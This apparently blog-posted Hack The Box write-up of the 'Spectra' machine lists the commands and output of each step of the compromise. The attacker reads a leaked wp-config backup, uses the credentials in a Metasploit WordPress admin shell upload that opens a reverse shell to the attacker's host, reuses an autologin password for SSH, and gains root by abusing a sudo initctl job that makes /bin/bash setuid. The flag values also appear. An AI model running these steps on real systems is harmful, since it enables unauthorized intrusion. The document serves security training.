Spectra

$ sudo nmap -p- -T4 -A 10.10.10.229
PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http             nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql            MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open  blackice-icecap?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Tue, 13 Apr 2021 21:03:56 GMT
|     Connection: close
|     Hello World
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Tue, 13 Apr 2021 21:04:02 GMT
|     Connection: close
|_    Hello World

http://spectra.htb/main/
http://spectra.htb/testing/  dir listing enabled 
$ curl http://spectra.htb/testing/wp-config.php.save
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
login http://spectra.htb/main with administrator/devteam01

$ msfconsle 
msf6 > use exploit/unix/webapp/wp_admin_shell_upload 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.10.10.229
rhost => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
[-] Unknown command: ser.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturl => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.109
lhost => 10.10.14.109
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lport 4444
lport => 4444
msf6 exploit(unix/webapp/wp_admin_shell_upload) >
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.109:4444 
[*] Authenticating with WordPress using administrator:devteam01...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /main/wp-content/plugins/ZmdnRtHCgv/pDjMUKSBiK.php...
[*] Sending stage (39282 bytes) to 10.10.10.229
[+] Deleted pDjMUKSBiK.php
[+] Deleted ZmdnRtHCgv.php
[+] Deleted ../ZmdnRtHCgv
[*] Meterpreter session 1 opened (10.10.14.109:4444 -> 10.10.10.229:35056) at 2021-04-13 19:57:04 -0400

meterpreter > shell
Process 29947 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
ls /home/
chronos
katie
nginx
root
user
ls /home/chronos
AutofillStates
BrowserMetrics-spare.pma
CrashpadMetrics-active.pma
Crowd Deny
Default
Dictionaries
FileTypePolicies
First Run
Floc
GrShaderCache
Local State
MEIPreload
OriginTrials
SSLErrorAssistant
Safe Browsing
Safe Browsing Cookies
Safe Browsing Cookies-journal
SafetyTips
ShaderCache
SmartDim
Subresource Filter
TLSDeprecationConfig
ZxcvbnData
chrome_shutdown_ms.txt
startup_settings_cache.json
user
ls /home/nginx
log
ls /home/katie
linpeas.sh #https://linpeas.sh/  Linux Privilege Escalation Awsome Script (linpeas.sh
log
passwd
user.txt
cat /home/katie/user.txt
cat: /home/katie/user.txt: Permission denied
cat /home/katie/passwd
SummerHereWeCome!!				*******************
cat /etc/passwd
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
ls /opt
VirtualBox
autologin.conf.orig
broadcom
displaylink
eeti
google
neverware
tpm1
tpm2

cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script

cat /etc/autologin
cat: /etc/autologin: Is a directory
ls /etc/autologin
passwd
cat /etc/autologin/passwd
SummerHereWeCome!!						***************

kali@kali:~/0.htb/machines/Spectra$ ssh katie@10.10.10.229
The authenticity of host '10.10.10.229 (10.10.10.229)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.229' (RSA) to the list of known hosts.
Password: 
Password: 
-bash-4.3$ 
-bash-4.3$ cat user.txt
e89d27fe195e9114ffa72ba8913a6130
-bash-4.3$ 
-bash-4.3$ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
-bash-4.3$ 

-bash-4.3$ vi /etc/init/test.conf 

script
chmod +s /bin/bash
end script
-bash-4.3$ sudo /sbin/initctl start test
test start/running, process 30646
-bash-4.3$ 
-bash-4.3$ /bin/bash -p
bash-4.3# whoami
root
bash-4.3#
bash-4.3# ls
main  nodetest.js  root.txt  script.sh  startup  test.conf
bash-4.3# cat root.txt 
d44519713b889d5e1f9e536d0c6df2fc
bash-4.3# 









Leave a Reply

Your email address will not be published. Required fields are marked *

Navigation